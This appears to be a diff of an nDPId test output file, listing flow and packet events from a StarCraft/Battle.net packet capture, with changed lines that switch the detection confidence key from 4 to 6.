00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1437389981256,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981256,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEYRAAIAGHDbAqAFkUO+6Gg27AFBEOrW3jntJ4FAQ+vAHdQAA"} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981330,"flow_last_seen":1437389981330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981330,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1437389981330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981330,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RD1AAIAG6XXAqAFkUO+6FQ28AFBBQIDMAAAAAIACIACx5gAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1437389981385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981385,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDbzhin+3QUCAzWASOQhgoQAAAgQFtAAA"} 
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1437389981385,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981385,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRD9AAIAG6X\/AqAFkUO+6FQ28AFBBQIDN4Yp\/uFAQ+vC2dQAA"} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982130,"flow_last_seen":1437389982130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982130,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1437389982130,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982130,"pkt":"hCYVPnXEIImEa8W6CABFAAA0Zr9AAIAGfH3AqAFk1fh\/gg29BF8F03V0AAAAAIACgABKLQAAAgQFtAEDAwABAQQC"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982140,"flow_last_seen":1437389982140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982140,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -155,13 +155,13 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1437389982183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982183,"pkt":"hCYVPnXEIImEa8W6CABFAAAoZsBAAIAGfIjAqAFk1fh\/gg29BF8F03V122fARVAQgADvOgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1437389982197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982197,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDb7iEHr2BauURGASOQiM8wAAAgQFtAAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1437389982197,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982197,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZBAAIAGHCrAqAFkUO+6Gg2+AFAFq5RE4hB691AQ+vDixwAA"} -00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982269,"flow_last_seen":1437389982269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982269,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1437389982269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982269,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RElAAIAG6WnAqAFkUO+6FQ2\/AFB8c4vnAAAAAIACIABrlQAAAgQFtAEDAwgBAQQC"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1437389982326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982326,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDb8Q\/FwJfHOL6GASOQgOjQAAAgQFtAAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1437389982327,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982327,"pkt":"hCYVPnXEIImEa8W6CABFAAAoREtAAIAG6XPAqAFkUO+6FQ2\/AFB8c4voEPxcClAQ+vBkYQAA"} -00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
+00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1437389982769,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":1437389982769,"pkt":"hCYVPnXEIImEa8W6CABFAAAeGS0AAIARpdHAqAFkBSq0ms+aBF8ACqcOCQE="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":200000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -178,38 +178,38 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1437389983663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983663,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EZpAAIAGHBTAqAFkUO+6Gg3BAFD6MpY\/AAAAAIACIADjdgAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1437389983723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983723,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcFck85k+jKWQGASOQjIewAAAgQFtAAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1437389983723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983723,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZtAAIAGHB\/AqAFkUO+6Gg3BAFD6MpZAXJPOZVAQ+vAeUAAA"} 
-00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983788,"flow_last_seen":1437389983788,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1437389983788,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983788,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RFRAAIAG6V7AqAFkUO+6FQ3CAFAtDsyVAAAAAIACIAB6SQAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1437389983846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983846,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDcLXOt3ELQ7MlmASOQjVRgAAAgQFtAAA"} 
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1437389983846,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983846,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRFZAAIAG6WjAqAFkUO+6FQ3CAFAtDsyW1zrdxVAQ+vArGwAA"} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985308,"flow_last_seen":1437389985308,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985308,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1437389985308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985308,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EaZAAIAGHAjAqAFkUO+6Gg3DAFAjjlJ6AAAAAIACIAD93gAAAgQFtAEDAwgBAQQC"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985320,"flow_last_seen":1437389985320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985320,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1437389985320,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985320,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EadAAIAGHAfAqAFkUO+6Gg3EAFAnGJJ3AAAAAIACIAC6VgAAAgQFtAEDAwgBAQQC"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1437389985363,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985363,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcNyhhfoI45Se2ASOQiDbQAAAgQFtAAA"} 